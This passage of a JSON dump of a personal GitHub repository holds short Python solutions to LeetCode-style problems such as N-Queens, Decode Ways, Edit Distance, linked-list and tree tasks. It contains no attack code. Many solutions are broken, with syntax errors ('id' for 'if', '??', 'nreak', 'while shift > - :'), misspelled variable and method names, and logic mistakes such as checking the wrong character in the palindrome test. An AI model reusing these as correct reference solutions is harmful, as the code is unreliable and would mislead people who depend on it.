"e4bc808c31337c86eb870c83a7d27112700e3b95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "no_license", "max_line_length": 57, "num_lines": 21, "path": "/Part2/Binary_Tree_Maximum_Path_Sum.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef maxPathSum(self, root):\n\t\tself.maxSum = float('-inf')\n\t\tself._maxPathSum(root)\n\t\treturn self.maxSum\n\n\tdef _maxPathSum(self, root):\n\t\tif root is None:\n\t\t\treturn 0\n\t\tleft = self._maxPathSum(root.left)\n\t\tright = self._maxPathSum(root.right)\n\t\tleft = left if left > 0 else 0\n\t\tright = right if right > 0 else 0\n\t\tself.maxSum = max(self.maxSum, root.val + left + right)\n\t\treturn max(left, right) + root.val\n\t\t" }, { "alpha_fraction": 0.5682210922241211, "alphanum_fraction": 0.5785837769508362, "avg_line_length": 30.83333396911621, "blob_id": "8f1fcd32d4ad81d8d67a7aa214173b0e0b30512f", "content_id": "13fe7c17eb16163767429eabf736d362467f3933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 86, "num_lines": 18, "path": "/Part2/N_Queens_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef totalNQueens(self, n):\n\t\tself.com = [False] * n\n\t\tself.diag = [False] * (2 * n)\n\t\tself.anti_diag = [False] * (2 * n)\n\t\tself.result = 0\n\t\tself.recursive(0, n)\n\t\treturn self.result\n\n\tdef recursive(self, row, n):\n\t\tif row == n:\n\t\t\tself.result += 1\n\t\telse:\n\t\t\tfor i in range(n):\n\t\t\t\tif not self.col[i] and not self.diag[row + i] and not self.anti_diag[n - i + row]:\n\t\t\t\t\tself.col[i] = self.diag[row + i] = self.anti_diag[n - i + row] = True\n\t\t\t\t\tself.recursie(row + 1, n)\n\t\t\t\t\tself.col[i] = self.diag[row + i] = self.anti_diag[n - i + row] = False\n\t\t\t\t\t\n" }, { "alpha_fraction": 0.6455026268959045, "alphanum_fraction": 0.6472663283348083, "avg_line_length": 20.730770111083984, "blob_id": "0c1f45082f760cd16d70be4be607b07d41f66c8d", "content_id": "f75eb3b551948133c16ae1097b4dd34741d093aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 69, "num_lines": 26, "path": "/Part1/Remove_Duplicates_From_Sorted_List_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\t\tdef mu_print(self):\n\t\t\tprint(self.val)\n\t\t\tif self.next:\n\t\t\t\tprint(self.next.val)\n\n\nclass Solution(object):\n\tdef deleteDuplicates(self, head):\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tcurr = dummy\n\t\tis_repeat = False\n\t\twhile curr.next:\n\t\t\twhile curr.next.next and curr.next.val == curr.next.next.next.val:\n\t\t\t\tcurr.next = curr.next.next\n\t\t\t\tis_repeat = True\n\t\t\tif is_repeat:\n\t\t\t\tcurr.next = curr.next.next\n\t\t\t\tis_repeat = False\n\t\t\telse:\n\t\t\t\tcurr = curr.next\n\t\treturn dummy.next\n\t\t" }, { "alpha_fraction": 0.530927836894989, "alphanum_fraction": 0.5567010045051575, "avg_line_length": 23, "blob_id": "3aff44d0e604b38302cc46e16d06a4006e5aee34", "content_id": "3ae551adec214a1802f3b04ae5e82e87605208b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/Part3/Excel_Sheet_Column_Number.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef titleToNumber(self, s):\n\t\tbase = ord('A') - 1\n\t\tn = len(s)\n\t\tresult = 0\n\t\tfor i in range(n):\n\t\t\tresult += (ord(s[n - 1 - i]) - base) * pow(26, i)\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6299212574958801, "alphanum_fraction": 0.6430445909500122, "avg_line_length": 20.08333396911621, "blob_id": "405e1f6b128160ed4fd7254f2bf9e1d950799cec", "content_id": "3bad19ceea9de0d87637b5a743984e8304b4b779", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "permissive", "max_line_length": 50, "num_lines": 36, "path": "/Part4/Insersection_Of_Two_Linked_Lists.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution(object):\n\tdef getIntersectionNode(self, headA, headB):\n\t\tnodeA, nodeB = headA, headB\n\t\twhile nodeA != nodeB:\n\t\t\tnodeA = nodeA.next if nodeA else nodeB\n\t\t\tnodeB = nodeB.next if nodeB else nodeA\n\n\t\treturn nodeA\n\n\tdef getIntersectionNode_diff(self, headA, headB):\n\t\tdef get_length(node):\n\t\t\tlength = 0\n\t\t\twhile node:\n\t\t\t\tnode = node.next\n\t\t\t\tlenght += 1\n\t\t\treturn length \n\n\t\tlen1 = get_length(headA)\n\t\tlen2 = get_length(headB)\n\n\t\tif len1 > len2:\n\t\t\tfor __ in range(len1 - len2):\n\t\t\t\theadA = headA.next\n\t\telse:\n\t\t\tfor __ in range(len2 - len1):\n\t\t\t\theadB = headB.next\n\t\twhile headA:\n\t\t\tif headA == headB:\n\t\t\t\treturn headA\n\t\t\theadA = headA.next\n\t\t\theadB = headB.next\n\t\t\t" }, { "alpha_fraction": 0.6282608509063721, "alphanum_fraction": 0.634782612323761, "avg_line_length": 17.440000534057617, "blob_id": "8c07257c6d1f4da57dbff33e675a0ae143e2edcb", "content_id": "2e107164fcf68a2d78fa8a584c31bf06d9e34deb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 37, "num_lines": 25, "path": "/Part2/Remove_Nth_Node_From_The_End_of_the_list.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\n\tdef myPrint(self):\n\t\tif self.next:\n\t\t\tself.next.myPrint()\n\nclass Solution(object):\n\tdef removeNthFromEnd(self, head, n):\n\t\tif not head:\n\t\t\treturn head\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tprev = dummy\n\t\tcur = dummy\n\t\twhile prev and n >= 0:\n\t\t\tprev = prev.next\n\t\t\tn -= 1\n\t\twhile prev:\n\t\t\tprev = prev.next\n\t\t\tcur = cur.next\n\t\tcur.next = cur.next.next\n\t\treturn dummy.next" }, { "alpha_fraction": 0.4617563784122467, "alphanum_fraction": 0.5212464332580566, "avg_line_length": 28.5, "blob_id": "359b3268f0b5b92284745829fe53f702f87da329", "content_id": "607d461f6f704da7535244296a1154c4d9c3f393", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 73, "num_lines": 12, "path": "/Part2/Decode_Ways.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef numDecodings(self, s):\n\t\tlength = len(s)\n\t\tif length == 0:\n\t\t\treturn 0\n\t\tdp = [0 for __ in range(length + 1)]\n\t\tdp[length] = 1\n\t\tdp[length - 1] = 1 id s[length - 1] != '0' else 0\n\t\tfor i in range(length - 2, -1, -1):\n\t\t\tif s[i] != '0':\n\t\t\t\tdp[i] = dp[i + 1] + dp[i + 2] if int(s[i:i + 2]) <= 26 else dp[i + 1]\n\t\treturn dp[0]" }, { "alpha_fraction": 0.5990453362464905, "alphanum_fraction": 0.6157518029212952, "avg_line_length": 41, "blob_id": "2071cf87b108e553bb8ab32e4c5cfa70ede9bcad", "content_id": "11035f662cbae5b5f324b07c775bdabae82af395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "no_license", "max_line_length": 119, "num_lines": 10, "path": "/Part1/Rotate_Image.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef rotate(self, matrix):\n\t\tn = len(matrix)\n\t\tfor row in range(n):\n\t\t\tfor column in range(n - row):\n\t\t\t\tmatrix[row][column], matrix[n - 1 - column][n - 1 - row] = matrix[n - 1 - column][n - 1 - row], matrix[row][column]\n\t\tfor row in range(n // 2):\n\t\t\tfor column in range(n):\n\t\t\t\tmatrix[row][column], matrix[n - 1 - row][column] = matrix[n - 1 - row][column], matrix[row][column]\n\t\treturn matrix" }, { "alpha_fraction": 0.6354514956474304, "alphanum_fraction": 0.6404682397842407, "avg_line_length": 34.05882263183594, "blob_id": "5d457eaa5faf514ff2d04cee1db91e4fafbe2e35", "content_id": "c32497d391167630ea655605b0491a16e1c73658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "no_license", "max_line_length": 58, "num_lines": 17, "path": "/Part2/Insert_Interval.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class interval(object):\n\tdef __init__(self, s=0, e=0):\n\t\tself.start = s\n\t\tself.end = e\n\n\tdef __str__(self):\n\t\treturn \"[\" + str(self.start) + \",\" + str(self.end) + \"]\"\nclass Solution(object):\n\tdef insert(self, intervals, newInterval):\n\t\tstart, end = newInterval.start, newInterval.end\n\t\tleft = list(filter(lambda x: x.end < start, intervals))\n\t\tright = list(filter(lambda x: x.start > end, intervals))\n\t\tif len(left) + len(right) != len(intervals):\n\t\t\tstart = min(start, intervals[len(left)].start)\n\t\t\tend = max(end, intervals[-len(right) - 1].end)\n\n\t\treturn left + [interval(start, end)] + right\n\t\t" }, { "alpha_fraction": 0.6123595237731934, "alphanum_fraction": 0.6198501586914062, "avg_line_length": 23.18181800842285, "blob_id": "b5197dffca541f0b8a3e233b1bb7911fc5c14cd0", "content_id": "d01a75c950725e5b85b86e225207fbe6f672555e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 54, "num_lines": 22, "path": "/Part2/Word_Ladder 2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef ladderLength(self, beginWord, endWord, wordList):\n\t\twordList.add(endWord)\n\t\tcur_level = [beginWord]\n\t\tnext_level = []\n\t\tdepth = 1\n\t\tn = len(beginWord)\n\t\twhile cur_level:\n\t\t\tfor item in cur_level:\n\t\t\t\tif item == endWord:\n\t\t\t\t\treturn depth\n\t\t\t\tfor i in range(n):\n\t\t\t\t\tfor c in 'abcdefghijklmnopqrstuvwxyz':\n\t\t\t\t\t\tword = item[:i] + c +item[i + 1:]\n\t\t\t\t\t\tif word in wordList:\n\t\t\t\t\t\t\twordList.remove(word)\n\t\t\t\t\t\t\tnext_level.append(word)\n\n\t\t\tdepth += 1\n\t\t\tcur_level = next_level\n\t\t\tnext_level = []\n\t\treturn 0\n\t\t" }, { "alpha_fraction": 0.45812806487083435, "alphanum_fraction": 0.4926108419895172, "avg_line_length": 21.33333396911621, "blob_id": "c18d4453031a7b52fabe94d626d75eb4c66f53a4", "content_id": "7ac2f798c0273921d54f1f90a38b0aab66190e31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 203, "license_type": "no_license", "max_line_length": 33, "num_lines": 9, "path": "/Part2/Unique_Binary_Search_Trees.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef numTrees(self, n):\n\t\tdp = [1 for __ in range(n + 1)]\n\t\tfor i in range(2, n + 1):\n\t\t\ts = 0\n\t\t\tfor j in range(i):\n\t\t\t\ts += dp[j] * dp[i - 1 - j]\n\t\t\tdp[i] = s\n\t\treturn dp[-1]\n\t\t" }, { "alpha_fraction": 0.4585365951061249, "alphanum_fraction": 0.507317066192627, "avg_line_length": 17.727272033691406, "blob_id": "ac40ddd629e0a32b14024e99b64255eb574506b4", "content_id": "d6c6644cb2559fbc2c80a87a9581689af4064516", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "permissive", "max_line_length": 31, "num_lines": 11, "path": "/Part4/Climbing_Stairs.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef climStairs(self, n):\n\t\tif n <= 2:\n\t\t\treturn n \n\n\t\tdp = [0 for __ in range(n)]\n\t\tdp[0] = 1\n\t\tdp[1] = 2\n\t\tfor i in range(2, n):\n\t\t\tdp[i] = dp[i - 1]+ dp[i - 2]\n\t\treturn dp[n - 1]" }, { "alpha_fraction": 0.5619718432426453, "alphanum_fraction": 0.608450710773468, "avg_line_length": 16.674999237060547, "blob_id": "564f602e91ec1a23cb5d9ca97c032bd127cc3fff", "content_id": "8c77952ce09717889bc9bb389f94f2ab9ff9e3a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 710, "license_type": "no_license", "max_line_length": 40, "num_lines": 40, "path": "/Part3/Add_TwoNumbers.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\n\tdef myPrint(self):\n\t\tprint(self.val)\n\t\tif self.next:\n\t\t\tself.next.myPrint()\n\nclass Solution(object):\n\tdef addTwoNumbers(self, l1, l2):\n\t\tresult = ListNode(0)\n\t\tcurr = result\n\t\twhile l1 or l2:\n\t\t\tcurr.val += self.addTwoNodes(l1, l2)\n\t\t\tif curr.val >= 10:\n\t\t\t\tcurr.val -= 10\n\t\t\t\tcurr.next = ListNode(1)\n\t\t\telse:\n\t\t\t\tif l1 and l1.next or l2 and l2.next:\n\t\t\t\t\tcurr.next = ListNode(0)\n\t\t\tcurr = curr.next\n\t\t\tif l1:\n\t\t\t\tl1 = l1.next\n\t\t\tif l2:\n\t\t\t\tl2 = l2.next\n\t\treturn result\n\n\tdef addTwoNodes(self, n1, n2):\n\n\t\tif not n1 and not n2:\n\t\t\tNone\n\n\t\tif not n1:\n\t\t\treturn n2.val\n\t\tif not n2:\n\t\t\tresult n1.val\n\n\t\treturn n1.val + n2.val\n\t\t\n" }, { "alpha_fraction": 0.6178861856460571, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 18.774192810058594, "blob_id": "f72aef3eb4d2d654cd11f81965ac52d1563e63be", "content_id": "3d7346fd834fd96868f07d03d44ffee42d0a344d", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "permissive", "max_line_length": 65, "num_lines": 31, "path": "/Part4/Recover_Binary_Search_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef __init__(self):\n\t\tself.node1 = None\n\t\tself.node2 = None\n\t\tself.pre = None\n\n\n\tdef recoverTree(self, root):\n\t\tself._scan(root)\n\t\tself.node1.val, self.node2.val = self.node2.val, self.node1.val\n\n\n\tdef _scan(self, root):\n\t\tif root is None:\n\t\t\treturn\n\t\tself._scan(root.left)\n\t\tif self.pre is not None:\n\t\t\tif root.val < self.pre.val:\n\t\t\t\tif self.node1 is None:\n\t\t\t\t\tself.node1 = self.pre\n\t\t\t\t\tself.node2 = root\n\t\t\t\telse:\n\t\t\t\t\tself.node2 = root\n\t\tself.pre = root\n\t\tself._scan(root.right)\n\t\t" }, { "alpha_fraction": 0.6100628972053528, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 27.727272033691406, "blob_id": "3451855eb2116ca24455398d5b35fb6724cc7bf7", "content_id": "d88f4991214fbcafd4f4863f883098f94292e42b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/Part1/Subsets_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef subsetswithDup(self, nums):\n\t\tresult = [[]]\n\t\tnums.sort()\n\t\ttemp_size = 0\n\t\tfor i in range(len(nums)):\n\t\t\tstart = temp_size if i >- 1 and nums[i] == nums[i - 1] else 0\n\t\t\ttemp_size = len(result)\n\t\t\tfor j in range(start, temp_size):\n\t\t\t\tresult.append(result[j] + nums[i])\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5982404947280884, "alphanum_fraction": 0.607038140296936, "avg_line_length": 17.77777862548828, "blob_id": "5be0287c8367ea7a77e5109d797779beb5870156", "content_id": "af7bb0561584df02ac892b90c976418d92fa93a0", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "permissive", "max_line_length": 32, "num_lines": 18, "path": "/Part4/Rotate_List.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef rotateRight(self, head, k):\n\t\tif not head:\n\t\t\treturn []\n\t\tcurr = head\n\t\tlength = 1\n\t\twhile curr.next:\n\t\t\tcurr = curr.next\n\t\t\tlength += 1\n\t\tcurr.next = head\n\t\tcur = head\n\t\tshift = length - k % length\n\t\twhile shift > - :\n\t\t\tcurr = curr.next\n\t\t\tshift -= 1\n\t\tresult = curr.next\n\t\tcurr.next = None\n\t\treturn result\n\t\t\n" }, { "alpha_fraction": 0.6552795171737671, "alphanum_fraction": 0.6552795171737671, "avg_line_length": 17.647058486938477, "blob_id": "ebfee03af3ef2a43a004c4c52ed6e73cb6f235b5", "content_id": "dc3d669d016b10596b9463bd53484cdc4f32013b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 28, "num_lines": 17, "path": "/Part1/Binary_Search_Tree_Iterator.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class BSTIterator(object):\n\tdef __init__(self, root):\n\t\tself.stack = []\n\t\tself._pushLeft(root)\n\n\tdef hasNext(self):\n\t\treturn self.stack\n\n\tdef next(self):\n\t\tnode = self.stack.pop()\n\t\tself._pushLeft(node.right)\n\t\treturn node.val\n\n\tdef _pushLeft(self, node):\n\t\twhile node:\n\t\t\tself.stack.append(node)\n\t\t\tnode = node.left \n\n\t\t\t" }, { "alpha_fraction": 0.426763117313385, "alphanum_fraction": 0.49547919631004333, "avg_line_length": 31.58823585510254, "blob_id": "55fe8e6d26556c1842ced7ec75395829a397b1ad", "content_id": "0f9c8d0b46630140e86251ae30006258dc351c89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 70, "num_lines": 17, "path": "/Part3/Dungeon_Game.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef calculateMinimumHp(self, dungeon):\n\t\tn = len(dungeon)\n\t\tm = len(dungeon[0])\n\t\tdp = [[0 for __ in range(m)] for __ in range(n)]\n\t\tdp[-1][-1] = 1 if dungeon[-1][-1] > 0 else 1 - dungeon[-1][-1]\n\n\t\tfor i in range(m - 2, -1, -1):\n\t\t\tdp[-1][i] = max(1, dp[-1][i + 1] - dungeon[-1][i])\n\n\t\tfor j in range(n - 2, -1, -1):\n\t\t\tdp[j][-1] = max(1, dp[j + 1][-1] - dungeon[j][-1])\n\n\t\tfor j in range(n - 2, -1, -1):\n\t\t\tfor i in range(m - 2, -1, -1):\n\t\t\t\tdp[j][i] = max(min(dp[j + 1][i], dp[j][i + 1]) - dungeon[j][i], 1)\n\t\treturn dp[0][0]" }, { "alpha_fraction": 0.6858974099159241, "alphanum_fraction": 0.692307710647583, "avg_line_length": 37.5, "blob_id": "eacbf85b6c302d5ca9044c2f32908e9d50285e61", "content_id": "1fec6a1bd7ab1a321b63d43fba90fb9690fbc7b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/Part2/Valid_Palindrom.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef isPalindrome(self, s):\n\t\talphanumerics = [c for c in s.lower() if s.isalnum()]\n\t\treturn alphanumerics == alphanumerics[::-1]\n\t\t" }, { "alpha_fraction": 0.6407766938209534, "alphanum_fraction": 0.643203854560852, "avg_line_length": 20.736841201782227, "blob_id": "2dafdfc3a9171ae3e587c3bfdcbc9ba89fcbd1e0", "content_id": "87fc043c9fde5824eb2a8baf6c5ec4085355ac2f", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "permissive", "max_line_length": 33, "num_lines": 19, "path": "/Part4/Populating_Next_Right_Pointers_in_Each_Node_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeLinkNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.next = None\n\nclass Solution(object):\n\tdef connect(self, root):\n\t\tdummy = TreeLinkNode(-1)\n\t\tnode = dummy\n\t\twhile root:\n\t\t\twhile root:\n\t\t\t\tnode.next = root.left\n\t\t\t\tnode = node.next or node\n\t\t\t\tnode.next = root.right\n\t\t\t\tnode = node.next or node\n\t\t\t\troot = root.next\n\t\t\troot, node = dummy.next, dummy" }, { "alpha_fraction": 0.6305084824562073, "alphanum_fraction": 0.6440678238868713, "avg_line_length": 21.538461685180664, "blob_id": "cec1aa3931738698defe208e334ff3a536da6163", "content_id": "139049645a874263de2f5a5698aa99039a655336", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 37, "num_lines": 13, "path": "/Part2/Best_Time_To_Buy_And_Sell_Stock.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maxProfit(self, prices):\n\t\tif len(prices) < 2:\n\t\t\treturn 0\n\n\t\tmin_price = prices[0]\n\t\tmax_profit = 0\n\t\tfor price in prices:\n\t\t\tif price < min_price:\n\t\t\t\tmin_price = price\n\t\t\tif price = min_price > max_profit:\n\t\t\t\tmax_profit = price - min_price\n\t\treturn max_profit\n\t\t" }, { "alpha_fraction": 0.545171320438385, "alphanum_fraction": 0.5623052716255188, "avg_line_length": 21.85714340209961, "blob_id": "ec34812a9089faa832be37385efbb7145ec85548", "content_id": "b69ddb1bca719789fd98504e941c55dedc776f01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 642, "license_type": "no_license", "max_line_length": 77, "num_lines": 28, "path": "/Part1/Search_or_A_Range.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef searchRange(self, nums,target):\n\t\tresult = []\n\t\tlength = len(nums)\n\t\tstart = 0\n\t\tend = length\n\t\twhile start < end:\n\t\t\tmid = (start + end) ?? 2\n\t\t\tif nums[mid] == target and (mid == 0 or nums[mid - 1] != target):\n\t\t\t\tresult.append(mid)\n\t\t\t\tbreak\n\t\t\tif nums[mid] < target:\n\t\t\t\tstart = mid + 1\n\t\t\telse:\n\t\t\t\tend = mid\n\t\tif not result:\n\t\t\treturn [-1, -1]\n\t\tend = length\n\t\twhile start < end:\n\t\t\tmid = (start + end) // 2\n\t\t\tif nums[mid] == target and (mid == length - 1 or nums[mid + 1] != target):\n\t\t\t\tresult.append(mid)\n\t\t\t\tnreak\n\t\t\tif nums[mid] <= target:\n\t\t\t\tstart = mid + 1\n\t\t\telse:\n\t\t\t\tend = mid\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.4395604431629181, "alphanum_fraction": 0.4989010989665985, "avg_line_length": 29.133333206176758, "blob_id": "f1c2fd3b48dfb3c4e8171519a2a82c2a74e0e372", "content_id": "590e96f985a3e5bb6531cb1e5b7779ae549f8c7e", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "permissive", "max_line_length": 82, "num_lines": 15, "path": "/Part4/Edit_distance.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef minDistance(self, word1, word2):\n\t\tm = len(word1)\n\t\tn = len(word2)\n\n\t\tdp = [[0 for __ in range(m + 1)] for __ in range( n + 1)]\n\t\tfor j in range(m + 1):\n\t\t\tdp[0][j] = j\n\t\tfor i in range(n + 1):\n\t\t\tdp[i][0] = i\n\t\tfor i in range(1, n + 1):\n\t\t\tfor j in range(1, m + 1):\n\t\t\t\tonemore = 1 if word1[j - 1] != word2[i - 1] else 0\n\t\t\t\tdp[i][j] = min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, do[i - 1][j - 1] + onemore)\n\t\treturn dp[n][m]\n\t\t\n" }, { "alpha_fraction": 0.511040985584259, "alphanum_fraction": 0.5457413196563721, "avg_line_length": 25.25, "blob_id": "08f28acfcf04e456c90b2244bbbcbed1af0f7416", "content_id": "ed53c2ade0849b0ba00e1946696f4c8b13f2b125", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "permissive", "max_line_length": 46, "num_lines": 12, "path": "/Part4/Candy.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef candy(self, ratings):\n\t\tn = len(ratings)\n\t\tcandy = [1] * n\n\t\tfor i in range(1, n):\n\t\t\tif ratings[i] > ratings[i - 1]:\n\t\t\t\tcandy[i] = candy[i - 1] + 1\n\n\t\tfor i in range(n - 2, -1, -1):\n\t\t\tif ratings[i] > ratings[i + 1]:\n\t\t\t\tcandy[i] = max(candy[i], candy[i + 1] + 1)\n\t\treturn sum(candy)\n\t\t" }, { "alpha_fraction": 0.8108108043670654, "alphanum_fraction": 0.8108108043670654, "avg_line_length": 17.5, "blob_id": "6e1d8e99e699637b8dde72a8556af8a2b03e4be5", "content_id": "cdf10a97874755ec86d62d5daa13e71d940697f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 37, "license_type": "no_license", "max_line_length": 20, "num_lines": 2, "path": "/README.md", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "# Personal_Work\nUpdating Coding Part\n" }, { "alpha_fraction": 0.45614033937454224, "alphanum_fraction": 0.5, "avg_line_length": 16.384614944458008, "blob_id": "be359617babab1efebffbb665014dcd403fcb457", "content_id": "70017e2d8c7420a540e590e7c386d962ab43adc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 228, "license_type": "no_license", "max_line_length": 27, "num_lines": 13, "path": "/Part3/Pow(x,n).py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef myPow(self, x, n):\n\t\tflag = 1if n >= 0 else -1\n\t\tresult = 1\n\t\tn = abs(n)\n\t\twhile n > 0:\n\t\t\tif n & 1 == 1:\n\t\t\t\tresult *= x\n\t\t\tn >>= 1\n\t\t\tx *= x\n\t\tif flag < 0:\n\t\t\tresult = 1 / result\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5210843086242676, "alphanum_fraction": 0.5451807379722595, "avg_line_length": 22.428571701049805, "blob_id": "35bc685e73c96e388daf689b9189006e8975bdda", "content_id": "1804a18b888d299c6087ca257fb9fd093f402226", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "permissive", "max_line_length": 51, "num_lines": 14, "path": "/Part4/Sort_Colors.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef sortColors(self, nums):\n\t\tleft = mid = 0\n\t\tright = len(nums) - 1\n\t\twhile mid <= right:\n\t\t\tif nums[mid] == 0:\n\t\t\t\tnums[mid], nums[left] = nums[left], nums[mid]\n\t\t\t\tleft += 1\n\t\t\t\tmid += 1\n\t\t\telif nums[mid] == 1:\n\t\t\t\tmid += 1\n\t\t\telse:\n\t\t\t\tnums[mid], nums[right] = nums[right], nums[mid]\n\t\t\t\tright -= 1\n\t\t\t\t" }, { "alpha_fraction": 0.4609375, "alphanum_fraction": 0.546875, "avg_line_length": 14.8125, "blob_id": "21ff79a3065b7c1bdf465f167ecc1e02d85a70b3", "content_id": "d9f1dbd491c2155f6fda81f38dc845af43274234", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 32, "num_lines": 16, "path": "/Part3/Reverse_Integer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef reverse(self, x):\n\t\tflag = 0\n\t\tif x < 0:\n\t\t\tflag = -1\n\t\telse:\n\t\t\tfalg = 1\n\t\tx *= flag\n\t\tresult = 0\n\t\twhile x:\n\t\t\tresult = result * 10 + x % 10\n\t\t\tx /= 10\n\t\tif result > 2147483647:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn result * flag\n\t\t\t" }, { "alpha_fraction": 0.6368715167045593, "alphanum_fraction": 0.6480447053909302, 